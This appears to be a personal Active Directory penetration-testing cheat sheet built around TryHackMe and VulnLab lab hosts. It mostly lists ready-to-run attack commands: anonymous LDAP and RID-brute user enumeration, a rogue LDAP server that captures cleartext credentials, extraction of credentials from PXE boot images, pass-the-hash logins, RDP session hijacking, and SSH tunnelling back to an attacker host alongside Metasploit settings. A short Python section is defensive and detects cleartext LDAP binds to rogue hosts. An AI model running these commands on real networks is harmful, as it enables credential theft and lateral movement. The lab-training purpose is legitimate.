Active directory
Good cheatsheet
Enum users
crackmapexec smb <IP> -u anonymous -p "" --rid-brute
ldapsearch -x -b "dc=baby,dc=vl" "user" -H ldap://baby.vl
Breaching
LDAP Pass-back Attack
Can be used when some other service (a printer, for example) authenticates against AD over LDAP and we can trick it into connecting to our own rogue LDAP server instead of the target's, so that it hands its credentials to us
install slapd
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
reconfigure each time
Note: set the domain to match the target's domain!
sudo dpkg-reconfigure -p low slapd
Create a new file with this content and save it as olcSaslSecProps.ldif (noanonymous,minssf=0,passcred forces the client to use a simple bind, i.e. to send the password in the clear)
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
Apply the new config and restart the service
ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && service slapd restart
Listen for incoming TCP traffic on port 389 to capture the credentials (breachad is the VPN interface, change it to yours)
sudo tcpdump -SX -i breachad tcp port 389
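The pass-back works because the victim falls back to an LDAP simple bind, which carries the password in the clear. As an added example (not part of these notes), here is the same BER structure decoded from the defender's side: a small Python parser for LDAPMessage/BindRequest that flags simple binds aimed at any host other than a known domain controller, which is what a pass-back from a printer looks like on the wire. The addresses, DN and password in the sample flows are constructed, not taken from any real capture.

```python
def _tlv(buf, pos):
    """Decode one BER tag/length/value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                   # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_bind_request(data):
    """Describe an LDAPMessage carrying a BindRequest; None for any other message."""
    tag, msg, _ = _tlv(data, 0)
    if tag != 0x30:                                     # LDAPMessage ::= SEQUENCE
        return None
    _, msg_id, pos = _tlv(msg, 0)                       # messageID INTEGER
    op_tag, op, _ = _tlv(msg, pos)
    if op_tag != 0x60:                                  # BindRequest ::= [APPLICATION 0]
        return None
    _, version, pos = _tlv(op, 0)                       # version INTEGER (3 for LDAPv3)
    _, name, pos = _tlv(op, pos)                        # name LDAPDN
    auth_tag, auth, _ = _tlv(op, pos)
    rec = {"id": int.from_bytes(msg_id, "big"), "version": version[0],
           "name": name.decode(errors="replace"), "auth": "other"}
    if auth_tag == 0x80:                                # simple [0]: password in the clear
        rec.update(auth="simple", password_len=len(auth))
    elif auth_tag == 0xA3:                              # sasl [3] SEQUENCE { mechanism, ... }
        rec["auth"] = "sasl/" + _tlv(auth, 0)[1].decode(errors="replace")
    return rec

def find_passback(flows, trusted_ldap_servers):
    """Flag simple binds aimed at any host that is not a trusted domain controller."""
    alerts = []
    for src, dst, payload in flows:
        rec = parse_bind_request(payload)
        if rec and rec["auth"] == "simple" and dst not in trusted_ldap_servers:
            alerts.append(f"{src} -> {dst}: cleartext bind as {rec['name']}")
    return alerts

def _ber(tag, body):
    """Short-form BER TLV encoder (bodies < 128 bytes), used only to build the samples."""
    return bytes([tag, len(body)]) + body

def simple_bind(msg_id, dn, password):
    """Constructed LDAPMessage{BindRequest} using simple authentication."""
    op = _ber(0x02, b"\x03") + _ber(0x04, dn.encode()) + _ber(0x80, password.encode())
    return _ber(0x30, _ber(0x02, bytes([msg_id])) + _ber(0x60, op))

TRUSTED_DCS = {"10.0.0.5"}                              # assumed address of the real DC
DN = "cn=svc-ldap,dc=baby,dc=vl"                        # constructed service account
SAMPLE_FLOWS = [("10.0.0.20", "10.0.0.5", simple_bind(1, DN, "sample-pw")),   # to the DC
                ("10.0.0.20", "10.0.0.99", simple_bind(2, DN, "sample-pw"))]  # to a rogue host
```

Feeding it the first TCP payload of each port-389 flow from a capture gives one alert per device that is binding in cleartext to something that is not your DC; a simple bind even to the real DC is worth a separate finding, since LDAPS or signing should be enforced there too.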
Retrieve credentials from a PXE boot image
Note: this is not a very common vulnerability, I think
After obtaining the file name of the image, e.g. x64{50364AB9-F5EF-4DAF-9501-1FE668B8691D}.bcd
Download it via tftp
tftp -i <IP> GET "\Tmp\x64{50364AB9-F5EF-4DAF-9501-1FE668B8691D}.bcd" conf.bcd
Read its contents via PowerPXE
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
Download the image itself
tftp -i <THMMDT IP> GET "<PXE Boot Image Location>" pxeboot.wim
Find credentials inside image
Get-FindCredentials -WimFile pxeboot.wim
Pass the hash
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
Session hijacking
RDP
Launch a shell as SYSTEM from an admin session
PSExec64.exe -s cmd.exe
Query sessions
query user
Connect another user's session (ID 3 here) to our own session (rdp-tcp#6 here)
tscon 3 /dest:rdp-tcp#6
Port forwarding
Socat
socat TCP4-LISTEN:13389,fork TCP4:THMIIS.za.tryhackme.com:3389
Pivoting via ssh
This example is from THM's Port forwarding course, check it out!
Add port forwards
Note: execute this on an already compromised host; it connects back from the compromised host to the attacker
Create a dummy user on the attacker's Linux box
useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser
ssh tunneluser@ATTACKER_IP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N
Set metasploit options
set lhost thmjmp2.za.tryhackme.com
set ReverseListenerBindAddress 127.0.0.1
set lport 7878
set srvhost 127.0.0.1
set srvport 6666
set rhosts 127.0.0.1
set rport 8888
LDAP enum
Anonymous enum
ldapsearch -x -b "dc=baby,dc=vl" "*" -H ldap://baby.vl
ldapsearch -x -b "dc=baby,dc=vl" "user" -H ldap://baby.vl